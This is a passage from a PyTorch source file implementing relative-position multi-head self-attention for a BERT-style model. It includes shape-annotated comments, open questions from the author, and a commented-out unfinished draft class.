dim) # what we want is to have, n heads: each head has n sequences and each sequence is defined by head_dim (2 heads, each head has 10 sequences; each sequence has 256 emb vector to define it) # We do this to multiply the needed parts together which are the emb dim and seq_len; as matrix multiple only happen to the last 2 indices q_head_perm, k_head_perm = q_heads.permute(0, 2, 1, 3), k_heads.permute(0, 2, 1, 3) # for we want to calculate emb_dim * seq (this is what matters) # q: [1, 2, 10, 256] -- k: [1, 2, 10, 256] --> k.T: [1, 2, 256, 10] qk = torch.matmul(q_head_perm, k_head_perm.permute(0, 1, 3, 2)) # shape: batch_size, n_heads, len_q, len_k # ----------------------- Relatives ------------------------ # 2. Relative of k --> [a_k] # [batch_size, len_sequence, emb_dim] r_k = self.relative_position_k(len_q, len_k) # shape: len_q x len_k x head_dim --> r_k.T: len_q x head_dim x len_k q2_r = q_heads.permute(1, 0, 2, 3).contiguous().view(len_q, batch_size*self.n_heads, self.head_dim) # shape: len_q x bsz*n_head x head_dim q_rk = torch.matmul(q2_r, r_k.transpose(1, 2)) # transpose only swaps the two indices together # shape: len_q x bsz*n_head x len_k --> we want to make bsz and n_head at first and leave interesting points to last 2 indices q_rk = q_rk.transpose(0, 1) # shape: bsz*n_head x len_q x len_k q_rk = q_rk.contiguous().view(batch_size, self.n_heads, len_q, len_k) # shape: batch_size, n_heads, len_q, len_k attn1, attn2 = qk, q_rk attn_total = (attn1 + attn2) / self.scale_factor # shape: batch_size, n_heads, len_q, len_k #if atten_mask is not None: # Question: ask hazem on how to adjust for mask # attn_total = attn_total.masked_fill(atten_mask == 0, -1e10) # End of Equation (5) # ------------------------ Value -------------------------- # Begining of Equation (3) # 1. Softmax of total pre attention: alpha_ij = softmax (e_ij) attn_soft = self.dropout(F.softmax(attn_total, dim=-1)) # shape: batch_size, n_heads, len_q, len_k # 3. Linear v --> x*W_v v = self.v_linear(v) # shape: batch_size, seq_len, emb_dim v_heads = v.view(batch_size, -1, self.n_heads, self.head_dim) # multiply last from 1st with prelast from 2nd v_heads = v_heads.permute(0, 2, 1, 3) # shape: batch_size, n_heads, seq_len, head_dim # 4. Softmax * linear v --> alpha_ij * [x*W_v] # For matrix mult: they should be same exact sizes except for last two + last_first == prelast_sec weight1 = torch.matmul(attn_soft, v_heads) # shape: batch_size, n_heads, len_q, head_dim # 2. Relative position of v --> a_v r_v = self.relative_position_v(len_q, len_v) # shape: len_q, len_v, head_dim attn_soft = attn_soft.permute(2, 0, 1, 3).contiguous().view(len_q, batch_size*self.n_heads, len_k) # shape: len_q, bsz*n_heads, len_k ## Question: how is len_v same as len_k? (for correct multiplication -- how do we know) # 5. Softmax * relative v --> alpha_ij * [a_v] weight2 = torch.matmul(attn_soft, r_v) # shape: len_q, bsz*n_heads, head_dim weight2 = weight2.transpose(0, 1).contiguous().view(batch_size, self.n_heads, len_q, self.head_dim) # shape: batch_size, n_heads, len_q, head_dim # 6. summation of (4) & (5) weights = weight1 + weight2 # shape: batch_size, n_heads, len_q, head_dim weights = weights.permute(0, 2, 1, 3).contiguous().view(batch_size, -1, self.emb_dim) # shape: batch_size, len_q, emb_dim ### linear over summation ### out = self.out(weights) # needed out_shape: batch_size, len_q, emb_dim return out # class SelfAttention(nn.Module): # def __init__(self, emb_size, clip, seq_len): # self.emb_size = emb_size # self.q_linear = nn.Linear(emb_size, emb_size) # self.k_linear = nn.Linear(emb_size, emb_size) # self.v_linear = nn.Linear(emb_size, emb_size) # self.max_clip = max(-clip, min(seq_len, clip)) # clip = self.clip # def forward(self, q, k, v, mask=None): # which one is the attention weights? and which is q/k/v weights? # q, k, v = self.q_linear(q), self.k_linear(k), self.v_linear(v) # # eq(5.1) == eq(2) --> qk_scale # qk_scale = (torch.matmul(q, k.transpose(-2, -1)))/math.sqrt(self.emb_size) # # eq(5.2) # k_relative = k[] # k[-] -- put clip? # qk_relative = (torch.matmul(q, k_relative.transpose(-1, -2)))/math.sqrt(self.emb_size) # qk_total = qk_scale + qk_relative # qk_total_soft = F.softmax(qk_total, dim=-1) # # eq(3) # v_relative = v[] # v_new = v + v_relative # qkv = torch.matmul(qk_total_soft, v_new)
hosnaa/bert-implement
src/relative_position.py
relative_position.py
py
10,928
python
en
code
0
github-code
36